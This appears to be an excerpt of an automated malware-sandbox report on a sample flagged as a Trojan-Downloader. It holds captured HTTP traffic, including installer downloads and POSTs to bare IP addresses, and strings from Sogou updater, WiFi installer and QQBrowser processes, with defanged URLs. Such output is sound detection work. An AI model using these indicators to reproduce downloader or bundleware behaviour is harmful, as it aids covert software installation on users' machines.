X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: tc_212_43
<<< skipped >>>
GET /pc_logo/7638937123950702413.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:50 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:50 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
<<< skipped >>>
POST / HTTP/1.1
Host: 123.129.242.139:80
Content-type: application/octet-stream
Content-Length: 2668
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=1766682-3168363
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 1766682-3168363/11709528
<<< skipped >>>
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8701288-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:44 GMT
Content-Type: application/octet-stream
Content-Length: 3008240
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8701288-11709527/11709528
<<< skipped >>>
GET /v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hXXp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:46 GMT
Content-Type: image/jpeg
Content-Length: 3008
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 07:12:45 GMT
Expires: Fri, 20 May 2016 07:12:45 GMT
Cache-Control: max-age=86400
ETag: 26af685efd16b705eda32b3ecb87e163
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_29_21
<<< skipped >>>
HEAD /v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hXXp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: imgstore.cdn.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:01 GMT
Content-Type: image/jpeg
Content-Length: 3008
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 07:12:45 GMT
Expires: Fri, 20 May 2016 07:12:45 GMT
Cache-Control: max-age=86400
ETag: 26af685efd16b705eda32b3ecb87e163
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_29_21
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2927382-5854763
Referer: hXXp://112.5.251.213/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:12:57 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
POST / HTTP/1.1
Host: 123.129.242.179:80
Content-type: application/octet-stream
Content-Length: 588
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
POST / HTTP/1.1
Host: 123.129.242.179:80
Content-type: application/octet-stream
Content-Length: 396
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5854764-8782145
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11545688-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: application/octet-stream
Content-Length: 163840
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11545688-11709527/11709528
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2977793-3168363
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
POST / HTTP/1.1
Host: 123.129.242.140:80
Content-type: application/octet-stream
Content-Length: 268
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 2156
Content-Type: application/octet-stream
Connection: Close
<<< skipped >>>
POST / HTTP/1.1
Host: 123.129.242.140:80
Content-type: application/octet-stream
Content-Length: 124
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 92
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=1065841-1766681
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8742324-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:45 GMT
Content-Type: application/octet-stream
Content-Length: 2967204
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8742324-11709527/11709528
<<< skipped >>>
GET /pc_logo/7638937123950702413.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:08 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2927382-5854763
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:12:56 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
POST / HTTP/1.1
Host: 123.129.242.139:80
Content-type: application/octet-stream
Content-Length: 316
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 1644
Content-Type: application/octet-stream
Connection: Close
<<< skipped >>>
The Trojan-Downloader connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessHeap
KERNEL32.dll
F:\SogouSoftwareWorkDir\SogouSoftware\Src\Launcher\Release\Launcher.pdb
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
manifest.cfg
SogouSoftware.dll
SogouSoftwareLoader.dll
0.0.0.1
Sogou.com Inc.
3.1.12.94
Launcher.exe
2014 Sogou.com Inc. All rights reserved.
wuauclt.exe_1792:
.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System
UpdateService.exe_1880:
.text
`.rdata
@.data
.rsrc
SHELL32.dll
USERENV.dll
KERNEL32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHDeleteKeyA
SHLWAPI.dll
VERSION.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WTSAPI32.dll
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetProcessHeap
RegOpenKeyExW
RegOpenKeyA
RegSetKeySecurity
RegCreateKeyA
RegCreateKeyExA
USBDT.dll
[%s Update Service]register success.
"%s" /Service
UpdateService.exe
[%s Update Service]register fail 3.
[%s Update Service]register fail 2.
[%s Update Service]register fail 1.
SogouSoftware_Mutex_{4A79E46E-5A01-4abb-BCC1-F96D06AEE085}
[%s Update Service]start register.
"%s" /Restart
[%s Update Service]wait %d minutes.
SogouSoftware.exe
SogouSoftware.exe /AutoRun
[%s Update Service]start service.
NUL=%s
wininit.ini
%s\Temp\
%s=%s
EXPLORER.EXE
IEXPLORE.EXE
%d%c%d
AllocateAndInitializeSid error %u
"%s" %s
Dbghelp.dll
Kernel32.dll
user32.dll
hXXp://ping.t.sogou.com/pingd?srctype=sogousoftware&t=%d&gid=%s&unc=%s&%s&rand=%d
serviceversion=%s
hXXp://ping.t.sogou.com/pingd?srctype=sogousoftware&t=%d&gid=%s&unc=%s&rand=%d
hXXp://t.sogou.com/update_platform/done.php?v=%s&appname=sogousoftware_update&state=1
Mddddd
%d.%d.%d.%d
%s_Classes\%s\%s
%s\%s
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%s_Classes\%s
http\shell\open\command
explorer.exe
%%X
%%x
err 02: %d
err 01: %d
1.0.0.0
CommonState.dll
Wininet.dll
UrlMon.dll
SGGuiFoundation{46558918-2F85-46DA-9639-1941E6282A1D}
[UpateDir:%s].
[%s Update Service]start update.
Setup.exe
[%s Update Service]update success.
[%s Update Service]new version: %s, local version: %s.
%s\%s%s
Profile.ini
hXXp://t.sogou.com/update_platform/update.php?appname=sogousoftware_update&unc=%s&guid=%s&useridbit1=%s&useridbit2=%s&v=%s&t=%d
[m_szLocalProfile:%s].
HotPatch.exe
Userenv.dll
iexplore.exe
\StringFileInfo\xx\%s
Update.ini
file%d
%s PID=%d
.bak.exe
wintrust.dll
2.5.4.3
CertCloseStore
CryptMsgClose
CertFreeCertificateContext
CertFindRDNAttr
CertRDNValueToStrA
CertCreateCertificateContext
CryptMsgGetParam
crypt32.dll
1.2.840.113549.1.9.5
CryptDecodeObject failed with %x
1.2.840.113549.1.9.6
rundll32.exe
%s,Rundll32
%s,Rundll32 E
%s,Rundll32 I
%s,Rundll32 R
Rundll32.exe %s,Rundll32 R
CLSID\%s\InprocServer32
CLSID\%s
SogouSoftware.dll
manifest.cfg
S%c%cR
%s*.sys
ATßT%d%d.dat
FT%uD
FT%uH
AT%uFT%u
%Program Files%\TENCENT\SSPlus\SData.dat
PendingFileRenameOperations
advapi32.dll
Sogou.com Inc.
3.1.13.79
(C) 2015 Sogou.com Inc. All rights reserved.
MiniThunderPlatform.exe_2060:
.textbss1U
.text
`.rdata
@.data
.idata
.rsrc
httpsProxy
ftpProxy
httpProxy
dwTcpSpeedLimit
ref_url_length
ref_url
url_length
udp_port
tcp_port
strCurrentExeFullPath
strExeFullPath
bug_report_dir
ShExecInfo
cmd_line
hKey
CertInfo
hMsg
XLBugReport_path
SSSh5
hXXp://store.paycenter.uc.cn
mail-attachment.googleusercontent.com
d:\minitp\src\minithunderplatform\src\minithunderplatform\downloadenginemanager.cpp
80000055
\/:*?"<>|
d:\minitp\src\minithunderplatform\src\dl_common\common\utility.cpp
_XL_SetAlwaysSendReport@4
_XL_SetReportShowMode@4
_XL_SetBugReportRootDir@4
unknown SDParameterType: %d when SDParameter::encode_data
unknown SDParameterType: %d when SDParameter::decode_data
Kernel32.dll
Run-Time Check Failure #%d - %s
MSPDB71.DLL
PSAPI.DLL
IMAGEHLP.DLL
KERNEL32.DLL
RegCloseKey
RegOpenKeyExA
ADVAPI32.DLL
d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb
||80000372
VERSION.dll
RASAPI32.dll
KERNEL32.dll
USER32.dll
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCP71.dll
SHLWAPI.dll
MSVCR71.dll
_CRT_RTC_INIT
_wcmdln
_amsg_exit
CryptMsgClose
CertCloseStore
CertFreeCertificateContext
CertGetNameStringW
CertFindCertificateInStore
CryptMsgGetParam
CRYPT32.dll
GetProcessHeap
id.dat
dl_peer_id.dll
dc.ini
download_engine.dll
MINITP\BugReport\
{C6B7F4D9-8D15-4a48-A722-B54C3D6FCE70}_67960FC3-A819-4fca-B939-F2B110716584_
{16C9DF46-AAF4-485d-AABE-4FE09E17E524}%s=%s
%hu%c%hu%c%hu%c%hu
http redirect loop for 5 times
http redirect url is invalid
http header is invalid
xml <item> no key
invalid rsa public key
invalid aes key
shell32.dll
\*.dll
XLBugReport.exe
XLBugHandler.dll
%sThumbs.db
Thumbs.db
%s*.*
3.2.1.42
WiFi-2175.exe_664:
.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.png" hotimage="
.png" pushedimage="
.png"/>
.png" />
.png" disabledimage="
.png"/>-->
.png" selected="true" selectedimage="
.png" userdata="28"/>
.png" userdata="29"/>
.png" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" foreimage="
.png" min="0" max="30000" value="50" hor="true" isstretchfore="false" />
<VerticalLayout width="587" height="437" bkimage="bg1.png">
<VerticalLayout width="587" height="437" bkimage="bg1.png">
<Button name="CancelBtn4UninstallPage" float="true" pos="477,387,0,0" width="90" height="30" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" normalimage="btn1.png" hotimage="btn2.png" pushedimage="btn2.png" />
<Button name="btn7" float="true" pos="42,387,0,0" width="24" height="25" bkimage="icon.png" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" />
.png" textcolor="#FF000000" disabledtextcolor="#FFA7A6AA" align="center" />
<VerticalLayout width="587" height="437" bkimage="bg2.png">
.png" group="Radio" selectedimage="
.png" userdata="34"/>
<VerticalLayout width="587" height="437" bkimage="bg3.png" >
.png" />-->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nss8.tmp\SetupPlugin.dll
tallPackages.xml
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss8.tmp\SetupPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss8.tmp
Nullsoft Install System v2.46.5-Unicode
nss8.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk7.tmp
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk7.tmp
C:\SogouDownload\
"C:\SogouDownload\WiFi-2175.exe"
%Program Files%\WiFi
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\WiFiMasterSetup\res
C:\SogouDownload
WiFi-2175.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\SogouDownload\WiFi-2175.exe
67765467
2.1.7.5
QQBrowser.exe_2624:
.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>> >$>(>,>0>4>~>
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
